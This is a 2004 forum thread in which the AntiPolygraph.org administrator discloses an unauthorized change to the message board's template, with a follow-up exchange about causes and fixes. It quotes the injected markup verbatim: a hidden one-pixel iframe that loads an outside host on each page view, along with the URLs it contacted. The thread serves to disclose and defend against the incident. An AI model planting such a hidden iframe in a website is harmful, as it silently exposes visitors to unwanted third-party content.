AntiPolygraph.org Message Board Hacked

Administrator · Jun 05, 2004, 11:47 PM

On 2 June 2004 at 11:28 hrs Pacific Daylight Time, the AntiPolygraph.org message board's template file was modified without authorization by an unknown person. The following text was inserted into the file:

<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div>

This code would cause a number of outside URLs to be contacted each time any page on the message board was loaded. Its intended purpose seems to be to deliver pop-up advertisements. Among the URLs that would automatically be contacted are:

http://re6.net/?s=1
http://sowor.ru
http://wall.sowor.ru/?tfnop=mgetx

The added code was removed on 5 June 2004 at 17:07 hrs PDT. We are researching this incident and taking measures to prevent a re-occurrence.

Administrator · Jun 06, 2004, 12:17 AM

Similar hacking incidents have been reported on other websites. See:

http://forums.hostreflex.com/showthread.php?p=1029#post1029

http://forums.eqdkp.com/index.php?showtopic=885

macagent · Sep 23, 2004, 01:02 AM

I have seen this exact same thing happen to my site. Did you ever find out what happened and how to prevent it?

Administrator · Sep 23, 2004, 05:05 AM

No, it is not clear how the template file was modified, though it may have been through a security flaw involving Macromedia Flash files. We disabled flash. In addition, if you are running YaBB, you can upgrade to version 1.3.2, which includes security fixes.

AntiPolygraph.org Message Board Hacked

Administrator

Administrator

macagent

Administrator

Quick Reply